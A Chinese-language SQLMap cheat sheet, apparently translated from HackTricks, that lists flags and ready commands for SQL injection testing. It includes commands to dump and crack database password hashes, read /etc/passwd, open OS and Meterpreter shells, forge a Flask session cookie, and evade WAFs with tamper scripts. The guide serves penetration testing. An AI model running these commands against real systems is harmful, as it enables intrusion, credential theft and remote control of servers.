当前位置: 首页 > article >正文

SQLMap使用指南

一、基本用法
# 1、通用参数
-u "<URL>" 
-p "<要测试的参数>" 
--user-agent=SQLMAP //指定UA
--random-agent //随机UA
--threads=10 //指定线程数
--risk=3 #MAX //风险等级,默认是1,最大是3
--level=5 #MAX //测试级别,默认是1,最大是5
//--level和--risk在某些方面有重叠,但它们各自侧重不同,--level是广度上的拓展,--risk 是深度上的挖掘。
--dbms="<指定数据库类型,比如Mysql,MSSQL>" 
--os="<指定操作系统类型>"
--technique="UB" //仅按顺序使用 UNION 和 BLIND 技术(默认“BEUSTQ”)
//B:布尔型盲注(Boolean-based blind)
E:报错型注入(Error-based)
U:联合查询注入(UNION query-based)
S:堆叠查询注入(Stacked queries)
T:时间型盲注(Time-based blind)
Q:内联查询注入(inline Query)
--batch //非交互模式,通常 Sqlmap 会询问,此处设置默认应答
--auth-type="<AUTH>" //HTTP 验证类型(基本、摘要、NTLM 或 PKI)
--auth-cred="<AUTH>" //HTTP 身份验证凭证(名称:密码)
--proxy=http://127.0.0.1:8080 //指定代理
--union-char "123" //用于测试联合查询注入的字符,默认情况下,sqlmap 测试联合查询注入会使用 NULL 字符。你可以手动指定
# 2、信息获取
--current-user //获取当前数据库用户
--is-dba //检查当前用户是否为数据库管理员账户
--hostname //获取主机名
--users //获取DBMS所有用户
--passwords //获取和破解 DBMS 用户的密码哈希
--privileges //获取 DBMS 所有用户权限
# 二、注入点

1、利用 Burp/ZAP 抓包文件

捕获请求并创建 request.txt 文件

sqlmap -r req.txt --current-user

2、GET注入

sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id

3、POST注入

sqlmap -u "http://example.com" --data "username=*&password=*"

4、标头和其他 HTTP 方法注入

//cookie注入
sqlmap  -u "http://example.com" --cookie "mycookies=*"

//HTTP标头注入
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"

//PUT请求注入
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"

//注入测试点位于"*"号处

5、注入成功时进行提示

--string="string_showed_when_TRUE" 

6、Eval

Sqlmap 允许使用 -e 或 --eval 来处理每个有效载荷,在每个请求期间运行自定义的 Python 代码。在下面的示例中,flask 在发送 flask cookie 会话之前,会使用已知secret对其进行签名:

sqlmap http://1.1.1.1/sqli --eval "from flask_unsign import session as s; session = s.sign({'uid': session}, secret='SecretExfilratedFromTheMachine')" --cookie="session=*" --dump

7、与系统shell交互

//执行系统命令
python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami

//获取交互式系统shell
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell

//带外shell,如Meterpreter 反向shell连接,当后端 DBMS 为 MySQL,PostgreSQL 或 Microsoft SQL Server 时,且当前会话用户拥有对数据库特定功能和架构缺陷的利用权限时,sqlmap 能够在攻击者机器与数据库服务器之间建立起有状态带外TCP连接。如Meterpreter 会话、或者图形用户界面(VNC)会话。
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn

8、读取文件

--file-read=/etc/passwd

9、使用SQLmap自动抓取网站

sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3

--batch //非交互式,默认应答
--crawl //抓取深度
--forms //解析和测试表单

10、二阶注入

python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs
# 三、定制化注入测试

1、设置后缀

python sqlmap.py -u "http://example.com/?id=1"  -p id --suffix="-- "

2、设置前缀

python sqlmap.py -u "http://example.com/?id=1"  -p id --prefix="') "

3、帮助寻找布尔注入

// --not-string“string”将有助于查找未出现在 True 响应中的字符串(用于查找布尔盲注)
sqlmap -r r.txt -p id --not-string ridiculous --batch

4、Tamper脚本

你可以用Python创建自己的Tamper脚本。

--tamper=name_of_the_tamper
//在kali中你可以在/usr/share/sqlmap/tamper中看到所有的脚本
//在windows中,可以在sqlmap\tamper文件夹中看到所有的脚本

常用Tamper脚本

Tamper描述
apostrophemask.py将撇号字符替换为其 UTF-8 全角对应字符
apostrophenullencode.py将撇号字符替换为非法的双 unicode 对应字符
appendnullbyte.py在有效载荷末尾添加已编码的 NULL 字节字符
base64encode.py使用Base64编码载荷中的所有字符
between.py将大于运算符 ('>') 替换为 'NOT BETWEEN 0 AND #'
bluecoat.py将 SQL 语句后的空格字符替换为有效的随机空白字符。然后将字符 = 替换为 LIKE 运算符
chardoubleencode.py对给定有效载荷中的所有字符进行双重 url 编码(不处理已编码字符)
commalesslimit.py将“LIMIT M, N”等实例替换为“LIMIT N OFFSET M”
commalessmid.py将“MID(A, B, C)”等实例替换为“MID(A FROM B FOR C)”
concat2concatws.py将“CONCAT(A, B)”等实例替换为“CONCAT_WS(MID(CHAR(0), 0, 0), A, B)”
charencode.py对给定载荷中的所有字符进行 URL 编码(不处理已编码的字符)
charunicodeencode.py使用Unicode-url 对给定载荷中的非编码字符进行编码(不处理已编码的字符)。格式: “%u0022”
charunicodeescape.py使用Unicode-url 对给定载荷中的非编码字符进行编码(不处理已编码的字符)。格式:"\u0022"
equaltolike.py将所有出现的运算符等于 ('=') 替换为运算符 'LIKE'
escapequotes.py斜杠转义引号(' 和 ")
greatest.py将大于运算符 ('>') 替换为 'GREATEST' 对应项
halfversionedmorekeywords.py在每个关键字前添加版本化的 MySQL 注释
ifnull2ifisnull.py将“IFNULL(A, B)”等实例替换为“IF(ISNULL(A), B, A)”
modsecurityversioned.py包含带有版本化注释的完整查询
modsecurityzeroversioned.py包含带有零版本注释的完整查询
multiplespaces.py在 SQL 关键字周围添加多个空格
nonrecursivereplacement.py用适合替换的表示形式替换预定义的 SQL 关键字(例如 .replace("SELECT", ""))过滤器
percentage.py在每个字符前面添加百分号 ('%')
overlongutf8.py转换给定有效载荷中的所有字符(不处理已编码的字符)
randomcase.py用随机大小写值替换每个关键字字符
randomcomments.py为 SQL 关键字添加随机注释
securesphere.py附加特殊制作的字符串
sp_password.py将“sp_password”附加到有效载荷的末尾,以自动混淆 DBMS 日志
space2comment.py用注释替换空格字符 (' ')
space2dash.py将空格字符 (' ') 替换为破折号注释 ('--'),后跟随机字符串和换行符 ('\n')
space2hash.py将空格字符 (' ') 替换为井号字符 ('#'),后跟随机字符串和换行符 ('\n')
space2morehash.py将空格字符 (' ') 替换为井号字符 ('#'),后跟随机字符串和换行符 ('\n')
space2mssqlblank.py将空格字符 (' ') 替换为有效替代字符集中的随机空白字符
space2mssqlhash.py将空格字符 (' ') 替换为井号字符 ('#'),后跟换行符 ('\n')
space2mysqlblank.py将空格字符 (' ') 替换为有效替代字符集中的随机空白字符
space2mysqldash.py将空格字符 (' ') 替换为破折号注释 ('--'),后跟换行符 ('\n')
space2plus.py将空格字符 (' ') 替换为加号 ('+')
space2randomblank.py将空格字符 (' ') 替换为有效替代字符集中的随机空白字符
symboliclogical.py将 AND 和 OR 逻辑运算符替换为其对应的符号运算符(&& 和 ||)
unionalltounion.py将 UNION ALL SELECT 替换为 UNION SELECT
unmagicquotes.py用多字节组合 %bf%27 代替引号字符 (') 并在末尾加上通用注释(使其生效)
uppercase.py将每个关键字字符替换为大写值“INSERT”
varnish.py附加 HTTP 标头“X-originating-IP”
versionedkeywords.py用版本化的 MySQL 注释括住每个非函数关键字
versionedmorekeywords.py用版本化的 MySQL 注释括住每个关键字
xforwardedfor.py附加假 HTTP 标头“X-Forwarded-For”
# 四、说明

参考资料:

sqlmap用户手册:https://sqlmap.highlight.ink/

原文:https://book.hacktricks.xyz/pentesting-web/sql-injection/sqlmap

本文由笔者在原文是编译,转载请注明来源。


http://www.kler.cn/a/326980.html

相关文章:

  • Spring(三)-SpringWeb-概述、特点、搭建、运行流程、组件、接受请求、获取请求数据、特殊处理、拦截器
  • Hmsc包开展群落数据联合物种分布模型分析通用流程(Pipelines)
  • 代码随想录 day52 第十一章 图论part03
  • 大数据、人工智能、云计算、物联网、区块链序言【大数据导论】
  • Linux(Ubuntu)命令大全——已分类整理,学习、查看更加方便直观!(2024年最新编制)
  • 如何在Windows系统上安装和配置Maven
  • Linux服务安装node,npm与yarn
  • 0-1开发自己的obsidian plugin DAY 6
  • 数据挖掘的基本步骤和流程解析:深入洞察与策略实施
  • 重修设计模式-行为型-责任链模式
  • ubuntu24.04 最好的输入法是什么?
  • 【ARM 嵌入式 编译系列 10.6 -- ARM toolchain examples】
  • 【Docker】解决Docker Engine stopped
  • cocos打包后发布web,控制台报错.plist资源下载404
  • Netty 与 WebSocket之间的关系
  • 宠物空气净化器该怎么选?希喂、美的、有哈这三款有推荐的吗?
  • 将 Go 作为脚本语言用及一些好用的包
  • 渗透测试入门学习——编写python脚本实现对网站登录页面的暴力破解
  • 自动化办公-Python中的for循环
  • 网络安全中的 EDR 是什么:概述和功能
  • 【芋道源码】gitee很火的开源项目pig——后台管理快速开发框架使用笔记(微服务版之本地开发环境篇)
  • 计算机网络面试题——第二篇
  • java中创建jdbc应用程序
  • OJ在线评测系统 前端 完善题目提交服务 细讲异步前端请求与后端接口交互
  • 代码随想录算法训练营第34天|46. 携带研究材料、416. 分割等和子集
  • Android 12系统源码_输入系统(三)输入事件的加工和分发